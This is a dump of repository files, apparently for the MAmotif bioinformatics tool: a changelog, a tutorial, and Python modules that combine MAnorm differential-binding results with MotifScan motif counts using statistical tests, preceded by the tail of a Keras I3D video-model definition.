1),\n use_bias=False,\n use_activation_fn=True,\n use_bn=True,\n name=None):\n \"\"\"Utility function to apply conv3d + BN.\n\n # Arguments\n x: input tensor.\n filters: filters in `Conv3D`.\n num_frames: frames (time depth) of the convolution kernel.\n num_row: height of the convolution kernel.\n num_col: width of the convolution kernel.\n padding: padding mode in `Conv3D`.\n strides: strides in `Conv3D`.\n use_bias: use bias or not\n use_activation_fn: use an activation function or not.\n use_bn: use batch normalization or not.\n name: name of the ops; will become `name + '_conv'`\n for the convolution and `name + '_bn'` for the\n batch norm layer.\n\n # Returns\n Output tensor after applying `Conv3D` and `BatchNormalization`.\n \"\"\"\n if name is not None:\n bn_name = name + '_bn'\n conv_name = name + '_conv'\n else:\n bn_name = None\n conv_name = None\n\n x = Conv3D(\n filters, (num_frames, num_row, num_col),\n strides=strides,\n padding=padding,\n use_bias=use_bias,\n name=conv_name)(x)\n\n if use_bn:\n bn_axis = 4\n x = BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)\n\n if use_activation_fn:\n x = Activation('relu', name=name)(x)\n\n return x\n\n channel_axis = 4\n inputs = Input(shape=(16, 224, 224, num_channels))\n\n # Downsampling via convolution (spatial and temporal)\n x = conv3d_bn(inputs, 64, 7, 7, 7, strides=(2, 2, 2), padding='same', name='Conv3d_1a_7x7')\n\n # Downsampling (spatial only)\n x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_2a_3x3')(x)\n x = conv3d_bn(x, 64, 1, 1, 1, strides=(1, 1, 1), padding='same', name='Conv3d_2b_1x1')\n x = conv3d_bn(x, 192, 3, 3, 3, strides=(1, 1, 1), padding='same', name='Conv3d_2c_3x3')\n\n # Downsampling (spatial only)\n x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_3a_3x3')(x)\n\n # Mixed 3b\n branch_0 = conv3d_bn(x, 64, 1, 1, 1, padding='same', name='Conv3d_3b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_3b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 128, 3, 3, 3, padding='same', name='Conv3d_3b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_3b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 32, 3, 3, 3, padding='same', name='Conv3d_3b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 32, 1, 1, 1, padding='same', name='Conv3d_3b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_3b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 3c\n branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_3c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 192, 3, 3, 3, padding='same', name='Conv3d_3c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_3c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 96, 3, 3, 3, padding='same', name='Conv3d_3c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_3c_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_3c_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_3c')([branch_0, branch_1, branch_2, branch_3])\n\n # Downsampling (spatial and temporal)\n x = MaxPooling3D((3, 3, 3), strides=(2, 2, 2), padding='same', name='MaxPool2d_4a_3x3')(x)\n\n # Mixed 4b\n branch_0 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_4b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 96, 1, 1, 1, padding='same', name='Conv3d_4b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 208, 3, 3, 3, padding='same', name='Conv3d_4b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 16, 1, 1, 1, padding='same', name='Conv3d_4b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 48, 3, 3, 3, padding='same', name='Conv3d_4b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4c\n branch_0 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 224, 3, 3, 3, padding='same', name='Conv3d_4c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4c_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4c_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4c')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4d\n branch_0 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_0a_1x1')\n\n branch_1 = conv3d_bn(x, 128, 1, 1, 1, padding='same', name='Conv3d_4d_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 256, 3, 3, 3, padding='same', name='Conv3d_4d_1b_3x3')\n\n branch_2 = conv3d_bn(x, 24, 1, 1, 1, padding='same', name='Conv3d_4d_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4d_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4d_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4d_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4d')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4e\n branch_0 = conv3d_bn(x, 112, 1, 1, 1, padding='same', name='Conv3d_4e_0a_1x1')\n\n branch_1 = conv3d_bn(x, 144, 1, 1, 1, padding='same', name='Conv3d_4e_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 288, 3, 3, 3, padding='same', name='Conv3d_4e_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_4e_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 64, 3, 3, 3, padding='same', name='Conv3d_4e_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4e_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 64, 1, 1, 1, padding='same', name='Conv3d_4e_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4e')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 4f\n branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_4f_0a_1x1')\n\n branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_4f_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_4f_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_4f_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_4f_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_4f_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_4f_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_4f')([branch_0, branch_1, branch_2, branch_3])\n\n # Downsampling (spatial and temporal)\n x = MaxPooling3D((2, 2, 2), strides=(2, 2, 2), padding='same', name='MaxPool2d_5a_2x2')(x)\n\n # Mixed 5b\n branch_0 = conv3d_bn(x, 256, 1, 1, 1, padding='same', name='Conv3d_5b_0a_1x1')\n\n branch_1 = conv3d_bn(x, 160, 1, 1, 1, padding='same', name='Conv3d_5b_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 320, 3, 3, 3, padding='same', name='Conv3d_5b_1b_3x3')\n\n branch_2 = conv3d_bn(x, 32, 1, 1, 1, padding='same', name='Conv3d_5b_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5b_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_5b_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5b_3b_1x1')\n\n x = Concatenate(axis=channel_axis, name='Mixed_5b')([branch_0, branch_1, branch_2, branch_3])\n\n # Mixed 5c\n branch_0 = conv3d_bn(x, 384, 1, 1, 1, padding='same', name='Conv3d_5c_0a_1x1')\n\n branch_1 = conv3d_bn(x, 192, 1, 1, 1, padding='same', name='Conv3d_5c_1a_1x1')\n branch_1 = conv3d_bn(branch_1, 384, 3, 3, 3, padding='same', name='Conv3d_5c_1b_3x3')\n\n branch_2 = conv3d_bn(x, 48, 1, 1, 1, padding='same', name='Conv3d_5c_2a_1x1')\n branch_2 = conv3d_bn(branch_2, 128, 3, 3, 3, padding='same', name='Conv3d_5c_2b_3x3')\n\n branch_3 = MaxPooling3D((3, 3, 3), strides=(1, 1, 1), padding='same', name='MaxPool2d_5c_3a_3x3')(x)\n branch_3 = conv3d_bn(branch_3, 128, 1, 1, 1, padding='same', name='Conv3d_5c_3b_1x1')\n\n x_concatenate = Concatenate(axis=channel_axis, name='Mixed_5c')([branch_0, branch_1, branch_2, branch_3])\n\n\n # create model\n if include_top:\n # Classification block\n x = AveragePooling3D((2, 7, 7), strides=(1, 1, 1), padding='valid',\n name='global_avg_pool')(x_concatenate)\n x = Dropout(dropout)(x)\n x = conv3d_bn(x, classes, 1, 1, 1, padding='same',\n use_bias=True, use_activation_fn=False,\n use_bn=False, name='Conv3d_6a_1x1_new')\n num_frames_remaining = int(x.shape[1])\n x = Reshape((num_frames_remaining, classes))(x)\n # logits (raw scores for each class)\n x = Lambda(lambda x: K.mean(x, axis=1, keepdims=False),\n output_shape=lambda s: (s[0], s[2]))(x)\n # if not endpoint_logit:\n x = Activation(dense_activation, name='prediction')(x)\n net_model = Model(inputs, x, name='i3d_inception')\n if freeze_conv_layers:\n for layer in net_model.layers[:-5]:\n layer.trainable = False\n # for layer in net_model.layers:\n # print(layer.name, layer.trainable)\n else:\n h = int(x.shape[2])\n w = int(x.shape[3])\n x = AveragePooling3D((2, h, w), strides=(1, 1, 1), padding='valid', name='global_avg_pool')(x_concatenate)\n net_model = Model(inputs, x, name='i3d_no_top')\n if freeze_conv_layers:\n for layer in net_model.layers[:-5]:\n layer.trainable = False\n # for layer in net_model.layers:\n # print(layer.name, layer.trainable)\n\n if weights is not None:\n net_model.load_weights(weights, by_name=True)\n\n return net_model\n" } ]
4
shao-lab/MAmotif
https://github.com/shao-lab/MAmotif
d13058d4665e6d54e3af43a105fb1f40396feafc
eae1bfefc74934f49565371b06971a9781d00528
70bfae07aa3af5a1704a4ef58455dc66b61800c4
refs/heads/master
2021-06-04T18:24:18.884617
2020-05-21T13:57:56
2020-05-21T13:57:56
107,871,360
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.42553192377090454, "alphanum_fraction": 0.5602836608886719, "avg_line_length": 16.625, "blob_id": "d03d36f913c49c9f647a1a18c0258e8a358dfb3b", "content_id": "1609d93de7a611894c1419bae89fc67e264b1c16", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 141, "license_type": "permissive", "max_line_length": 50, "num_lines": 8, "path": "/CHANGELOG.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "ChangeLog\n=========\n\nv1.1.0 (2020-05-15)\n-------------------\n\n* Rewritten for Python 3.6+\n* Compatible with MAnorm 1.3.0 and MotifScan 1.2.0\n" }, { "alpha_fraction": 0.6521086692810059, "alphanum_fraction": 0.6654442548751831, "avg_line_length": 33.676300048828125, "blob_id": "40fdf404fd8b9febb0a956539b729c34be9ddec7", "content_id": "d63ce4533b8f959fcdc72af30c37ca45b82d1d15", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6001, "license_type": "permissive", "max_line_length": 121, "num_lines": 173, "path": "/docs/source/tutorial.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _tutorial:\n\n========\nTutorial\n========\n\n.. contents::\n :local:\n\nInstallation\n============\n\nLike many other Python packages and bioinformatics softwares, MAmotif can be\nobtained easily from PyPI_ or Bioconda_.\n\nPrerequisites\n-------------\n\n* Python >= 3.6\n* MAnorm >= 1.3.0\n* motifscan >= 1.2.0\n* numpy >= 1.15\n* scipy >= 1.0\n\n\nInstall with pip\n----------------\nThe latest release of MAmotif is available at PyPI_, you can install via ``pip``::\n\n $ pip install mamotif\n\n.. _PyPI: https://pypi.org/project/MAmotif/\n\nInstall with conda\n------------------\n\nYou can also install MAmotif with conda_ through Bioconda_ channel::\n\n $ conda install -c bioconda mamotif\n\n.. _conda: https://conda.io/\n.. _Bioconda: https://bioconda.github.io/\n\n\nUsage of MAmotif\n================\n\nTo check whether MAmotif is properly installed, you can inspect the version of\nMAmotif by the ``-v/--version`` option::\n\n $ mamotif --version\n\nConfiguration\n-------------\n\nBefore running MAmotif, you need to configure the genome and motif data files\nfor `MotifScan`:\n\nPlease refer to the QuickStart_ section of MotifScan for the details.\n\n.. _QuickStart: https://motifscan.readthedocs.io/en/latest/quickstart.html\n\nRun complete MAmotif workflow\n-----------------------------\n\nMAmotif provide a console script ``mamotif`` for running the program, the\n``mamotif run`` sub-command is used to run complete MAmotif workflow\n(MAnorm + MotifScan + Integration).\n\n.. code-block:: shell\n\n $ mamotif run --p1 sampleA_peaks.bed --p2 sampleB_peaks.bed --r1 sampleA_reads.bed --r2 sampleB_reads.bed -g <genome>\n –m <motif_set> -o <output_dir>\n\n.. tip::\n\n The ``run`` sub-command only provides basic MAnorm/MotifScan options.\n If you want to control other advanced options (MAnorm normalization\n options or MotifScan scanning options), please run them independently and\n call MAmotif integration module with the ``mamotif integrate`` sub-command.\n\nOptions\n^^^^^^^\n\n-h, --help Show help message and exit.\n--verbose Enable verbose log output.\n--p1, --peak1 **[Required]** Peak file of sample A.\n--p2, --peak2 **[Required]** Peak file of sample B.\n--pf, --peak-format Format of the peak files. Default: bed\n--r1, --read1 **[Required]** Read file of sample A.\n--r2, --read2 **[Required]** Read file of sample B.\n--rf, --read-format Format of the read files. Default: bed\n--n1, --name1 Name of sample A.\n--n2, --name2 Name of sample B.\n--s1, --shiftsize1 Single-end reads shiftsize of sample A. Default: 100\n--s2, --shiftsize2 Single-end reads shiftsize of sample B. Default: 100\n--pe, --paired-end Paired-end mode.\n-m **[Required]** Motif set to scan for.\n-g **[Required]** Genome name.\n-p P value cutoff for motif scores. Default: 1e-4\n-t, --threads Number of processes used to run in parallel.\n--mode Which sample to perform MAmotif on {both,A,B}. Default: both\n--split Split genomic regions into promoter/distal regions and\n run separately.\n--upstream TSS upstream distance for promoters. Default: 4000\n--downstream TSS downstream distance for promoters. Default: 2000\n--correction Method for multiple testing correction {benjamin,bonferroni}.\n Default: benjamin\n-o, --output-dir Directory to write output files.\n\n\nIntegrate MAnorm and MotifScan results\n--------------------------------------\n\nThe ``mamotif integrate`` sub-command is used when users have already got the\nMAnorm and MotifScan results, and only run the final integration procedure.\n\nSuppose you have the MAnorm result (sample A vs sample B), and the MotifScan\nresults for both samples:\n\nTo find cell type-specific co-factors for sample A:\n\n.. code-block:: shell\n\n $ mamotif integrate -i A_MAvalues.xls -m A_motifscan/motif_sites_numbers.xls -o <path>\n\nConvert M=log2(A/B) to -M=log2(B/A) and find co-factors for sample B:\n\n.. code-block:: shell\n\n $ mamotif integrate -i B_MAvalues.xls -m B_motifscan/motif_sites_numbers.xls -n -o <path>\n\nOptions\n^^^^^^^\n\n-h, --help Show help message and exit.\n--verbose Enable verbose log output.\n-i MAnorm result for sample A or B (A/B_MAvalues.xls).\n-m MotifScan result for sample A or B (motif_sites_number.xls).\n-n, --negative Convert M=log2(A/B) to -M=log2(B/A). Required when finding\n co-factors for sample B.\n-g Genome name. Required if `--split` is enabled.\n--split Split genomic regions into promoter/distal regions and run separately.\n--upstream TSS upstream distance for promoters. Default: 4000\n--downstream TSS downstream distance for promoters. Default: 2000\n--correction Method for multiple testing correction {benjamin,bonferroni}.\n Default: benjamin\n-o, --output-dir Directory to write output files.\n\nMAmotif Output\n==============\n\nAfter finished running MAmotif, all output files will be written to the directory\nyou specified with \"-o\" argument.s\n\nThe MAmotif output table includes the following columns:\n\n::\n\n 1. Motif Name\n 2. Target Number: Number of motif-present peaks\n 3. Average of Target M values: Average M-value of motif-present peaks\n 4. Std. of Target M values: M-value Std. of motif-present peaks\n 5. Non-target Number: Number of motif-absent peaks\n 6. Average of Non-target M-value: Average M-value of motif-absent peaks\n 7. Std. of Non-target M-value: M-value Std. of motif-absent peaks\n 8. T-test Statistics: T-Statistic for M-values of motif-present peaks against motif-absent peaks\n 9. T-test P-value: Right-tailed P-value of T-test\n 10. T-test P-value By Benjamin/Bonferrroni correction\n 11. RanSum-test Statistic\n 12. RankSum-test P-value\n 13. RankSum-test P-value By Benjamin/Bonferroni correction\n 14. Maximal P-value: Maximal corrected P-value of T-test and RankSum-test\n" }, { "alpha_fraction": 0.6057673096656799, "alphanum_fraction": 0.6085904240608215, "avg_line_length": 39.317073822021484, "blob_id": "63b0aa3a77609f7671812653b4e01d35a6fe1da0", "content_id": "af0ea0bba395b419a377307acb5eba2b7ce75d5a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4959, "license_type": "permissive", "max_line_length": 79, "num_lines": 123, "path": "/mamotif/integration.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.integration\n-------------------\n\nThe final integration module of MAmotif.\n\"\"\"\n\nimport logging\nimport os\n\nimport numpy as np\nfrom motifscan.genome import Genome\nfrom motifscan.region.utils import subset_by_location\n\nfrom mamotif.io import write_mamotif_results\nfrom mamotif.region import load_mamotif_regions\nfrom mamotif.stats import mamotif_t_test, mamotif_ranksum_test, adjust_p_values\n\nlogger = logging.getLogger(__name__)\n\n\nclass MAmotifResult:\n def __init__(self, motif, n_pos, mean_pos, std_pos, n_neg, mean_neg,\n std_neg, t_stat, t_pval, t_padj, r_stat, r_pval, r_padj,\n padj):\n self.motif = motif\n self.n_pos = n_pos\n self.mean_pos = mean_pos\n self.std_pos = std_pos\n self.n_neg = n_neg\n self.mean_neg = mean_neg\n self.std_neg = std_neg\n self.t_stat = t_stat\n self.t_pval = t_pval\n self.t_padj = t_padj\n self.r_stat = r_stat\n self.r_pval = r_pval\n self.r_padj = r_padj\n self.padj = padj\n\n\ndef mamotif_test(motifs, regions, negative=False, correction='benjamin'):\n results = []\n for idx, motif in enumerate(motifs):\n m_values_pos = []\n m_values_neg = []\n for region in regions:\n if region.has_motif[idx]:\n m_values_pos.append(region.m_value)\n else:\n m_values_neg.append(region.m_value)\n m_values_pos = np.asarray(m_values_pos)\n m_values_neg = np.asarray(m_values_neg)\n if negative: # convert M to -M for sample B, log2(A/B)-> log2(B/A)\n m_values_pos = -m_values_pos\n m_values_neg = -m_values_neg\n t_test = mamotif_t_test(m_values_pos, m_values_neg)\n r_test = mamotif_ranksum_test(m_values_pos, m_values_neg)\n result = MAmotifResult(\n motif=motif, n_pos=len(m_values_pos), mean_pos=m_values_pos.mean(),\n std_pos=m_values_pos.std(), n_neg=len(m_values_neg),\n mean_neg=m_values_neg.mean(), std_neg=m_values_neg.std(),\n t_stat=t_test[0], t_pval=t_test[1], t_padj=None,\n r_stat=r_test[0], r_pval=r_test[1], r_padj=None,\n padj=None)\n results.append(result)\n\n # multiple testing correction\n p_values_t = [result.t_pval for result in results]\n p_values_r = [result.r_pval for result in results]\n adjusted_p_values_t = adjust_p_values(p_values_t, correction=correction)\n adjusted_p_values_r = adjust_p_values(p_values_r, correction=correction)\n for idx, result in enumerate(results):\n result.t_padj = adjusted_p_values_t[idx]\n result.r_padj = adjusted_p_values_r[idx]\n if np.isnan(result.t_padj):\n result.padj = result.r_padj\n elif np.isnan(result.r_padj):\n result.padj = result.t_padj\n else:\n result.padj = max(result.t_padj, result.r_padj)\n return results\n\n\ndef run_integration(f_manorm, f_motifscan, negative=False, genome=None,\n split=False, upstream=4000, downstream=2000,\n correction='benjamin', output_dir=None):\n motifs, regions = load_mamotif_regions(f_manorm, f_motifscan)\n sample_name = os.path.basename(f_manorm).replace('_MAvalues.xls', '')\n output_dir = os.path.abspath(output_dir or os.getcwd())\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n results = mamotif_test(motifs=motifs, regions=regions,\n negative=negative, correction=correction)\n path = os.path.join(output_dir, sample_name + '_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results, correction=correction)\n\n if split:\n logger.info(\"Split into promoter/distal regions\")\n genome = Genome(genome)\n regions_promoter = subset_by_location(\n regions=regions, genes=genome.genes, location='promoter',\n upstream=upstream, downstream=downstream)\n regions_distal = subset_by_location(\n regions=regions, genes=genome.genes, location='distal',\n upstream=upstream, downstream=downstream)\n\n logger.info(\"Performing MAmotif on promoter regions\")\n results = mamotif_test(motifs=motifs, regions=regions_promoter,\n negative=negative, correction=correction)\n path = os.path.join(output_dir,\n sample_name + '_promoter_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results,\n correction=correction)\n\n logger.info(\"Performing MAmotif on distal regions\")\n results = mamotif_test(motifs=motifs, regions=regions_distal,\n negative=negative, correction=correction)\n path = os.path.join(output_dir,\n sample_name + '_distal_MAmotif_output.xls')\n write_mamotif_results(path=path, results=results,\n correction=correction)\n" }, { "alpha_fraction": 0.5796559453010559, "alphanum_fraction": 0.5796559453010559, "avg_line_length": 39.51515197753906, "blob_id": "1eb87c06f6366af8a45f1cf9111dadb234f48f04", "content_id": "f1a4c3d48c46c8ca3eaa4c77815856a0dca9204a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1337, "license_type": "permissive", "max_line_length": 79, "num_lines": 33, "path": "/mamotif/io.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.io\n----------\nI/O module of MAmotif.\n\"\"\"\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef write_mamotif_results(path, results, correction):\n logger.info(f\"Saving MAmotif results to {path}\")\n correction_str = correction.capitalize()\n columns = [\"Motif Name\", \"Target Number\", \"Average of Target M values\",\n \"Std. of Target M values\", \"Non-target Number\",\n \"Average of Non-target M values\", \"Std. of Non-target M values\",\n \"T-test Statistic\", \"T-test P value (right-tailed)\",\n f\"T-test P value By {correction_str} correction\",\n \"RankSum-test Statistic\", \"RankSum-test P value (right-tailed)\",\n f\"RankSum-test P value By {correction_str} correction\",\n \"Maximal corrected P value\\n\"]\n header = '\\t'.join(columns)\n results.sort(key=lambda x: x.padj)\n with open(path, 'w') as fout:\n fout.write(header)\n for result in results:\n fout.write(\n f\"{result.motif}\\t{result.n_pos}\\t{result.mean_pos}\\t\"\n f\"{result.std_pos}\\t{result.n_neg}\\t{result.mean_neg}\\t\"\n f\"{result.std_neg}\\t{result.t_stat}\\t{result.t_pval}\\t\"\n f\"{result.t_padj}\\t{result.r_stat}\\t{result.r_pval}\\t\"\n f\"{result.r_padj}\\t{result.padj}\\n\")\n" }, { "alpha_fraction": 0.6221884489059448, "alphanum_fraction": 0.630699098110199, "avg_line_length": 40.125, "blob_id": "3d7da50539266b1e78a9dd2354d43c0dda57b9f9", "content_id": "ff430dfc15bbf22b449360735d47977c836d6a1b", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3290, "license_type": "permissive", "max_line_length": 79, "num_lines": 80, "path": "/mamotif/cli/run.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.run\n---------------\n\nRun complete MAmotif workflow (MAnorm + MotifScan + Integration).\n\"\"\"\n\nimport logging\nimport os\n\nimport manorm.cli as cli_manorm\nimport motifscan.cli.main as cli_motifscan\n\nfrom mamotif.integration import run_integration\n\nlogger = logging.getLogger(__name__)\n\n\ndef run_manorm_from_mamotif(args):\n args.name1 = args.name1 or os.path.splitext(\n os.path.basename(args.peak_file1))[0]\n args.name2 = args.name2 or os.path.splitext(\n os.path.basename(args.peak_file2))[0]\n manorm_dir = os.path.abspath(\n os.path.join(args.output_dir,\n f'{args.name1}_vs_{args.name2}_manorm_output'))\n args_manorm = [\n \"--p1\", args.peak_file1, \"--p2\", args.peak_file2,\n \"--pf\", args.peak_format, \"--r1\", args.read_file1,\n \"--r2\", args.read_file2, \"--rf\", args.read_format,\n \"--n1\", args.name1, \"--n2\", args.name2,\n \"--s1\", args.shift_size1, \"--s2\", args.shift_size2,\n \"--wa\", \"-o\", manorm_dir]\n if args.paired:\n args_manorm.append(\"--pe\")\n\n parser_manorm = cli_manorm.configure_parser()\n args_manorm = parser_manorm.parse_args(map(str, args_manorm))\n args_manorm = cli_manorm.preprocess_args(args_manorm)\n cli_manorm.run(args_manorm)\n return manorm_dir\n\n\ndef run_motifscan_from_mamotif(args, f_manorm):\n sample_name = os.path.basename(f_manorm).replace('_MAvalues.xls', '')\n motifscan_dir = os.path.abspath(\n os.path.join(args.output_dir, f'{sample_name}_motifscan_output'))\n args_motifscan = [\n \"scan\", \"-i\", f_manorm, \"-f\", \"manorm\", \"--motif\", args.motif,\n \"--genome\", args.genome, \"-p\", args.p_value, \"-t\", args.n_threads,\n \"--no-enrich\", \"-o\", motifscan_dir]\n\n parser_motifscan = cli_motifscan.configure_parser_main()\n args_motifscan = parser_motifscan.parse_args(map(str, args_motifscan))\n args_motifscan.func(args_motifscan)\n return os.path.join(motifscan_dir, \"motif_sites_number.xls\")\n\n\ndef run(args):\n cli_manorm.setup_logger(args.verbose)\n cli_motifscan.setup_logger(args.verbose)\n manorm_dir = run_manorm_from_mamotif(args)\n if args.mode in ['both', 'A']:\n logger.info(\"\\nScanning motifs for sample A\")\n f_manorm = os.path.join(manorm_dir, f\"{args.name1}_MAvalues.xls\")\n f_motifscan = run_motifscan_from_mamotif(args, f_manorm)\n logger.info(\"Running MAmotif for sample A\")\n run_integration(f_manorm=f_manorm, f_motifscan=f_motifscan,\n negative=False, genome=args.genome, split=args.split,\n upstream=args.upstream, downstream=args.downstream,\n correction=args.correction, output_dir=args.output_dir)\n if args.mode in ['both', 'B']:\n logger.info(\"\\nScanning motifs for sample B\")\n f_manorm = os.path.join(manorm_dir, f\"{args.name2}_MAvalues.xls\")\n f_motifscan = run_motifscan_from_mamotif(args, f_manorm)\n logger.info(\"Running MAmotif for sample B\")\n run_integration(f_manorm=f_manorm, f_motifscan=f_motifscan,\n negative=True, genome=args.genome, split=args.split,\n upstream=args.upstream, downstream=args.downstream,\n correction=args.correction, output_dir=args.output_dir)\n" }, { "alpha_fraction": 0.5994733572006226, "alphanum_fraction": 0.602106511592865, "avg_line_length": 31.55238151550293, "blob_id": "a1292a94db148b7bc778a6d4c4acbc88c8340ac9", "content_id": "1b16d89fde3621ee734a759c48483cdbfa40effb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3418, "license_type": "permissive", "max_line_length": 78, "num_lines": 105, "path": "/mamotif/region.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.region\n--------------\nGenomic regions use in MAmotif.\n\"\"\"\n\nimport logging\n\nimport numpy as np\nfrom motifscan.region import load_motifscan_regions\n\nlogger = logging.getLogger(__name__)\n\n\nclass MamotifRegion:\n \"\"\"Class for a MAmotif genomic region.\n\n Parameters\n ----------\n chrom : str\n The chromosome name of the region.\n start : int\n The start coordinate of the region.\n end : int\n The end coordinate of the region.\n m_value: float, optional\n The m_value of the region.\n n_sites: list of int\n The motif sites numbers of the region.\n\n Attributes\n ----------\n chrom : str\n The chromosome name of the region.\n start : int\n The start coordinate of the region.\n end : int\n The end coordinate of the region.\n m_value : float or None\n The m_value of the region or None if not specified.\n has_motif : list of bool\n The target site indicators for motifs.\n\n Notes\n -----\n The coordinates are 0-based, which means the region range is [start, end).\n \"\"\"\n\n def __init__(self, chrom, start, end, n_sites, m_value=None):\n self.chrom = chrom\n self.start = int(start)\n self.end = int(end)\n self.m_value = m_value\n self.has_motif = np.asarray(n_sites) > 0\n\n def match_manorm(self, manorm_regions):\n for region in manorm_regions:\n if (region.chrom == self.chrom) and (\n region.start == self.start) and (region.end == self.end):\n self.m_value = region.score\n break\n if self.m_value is None:\n raise 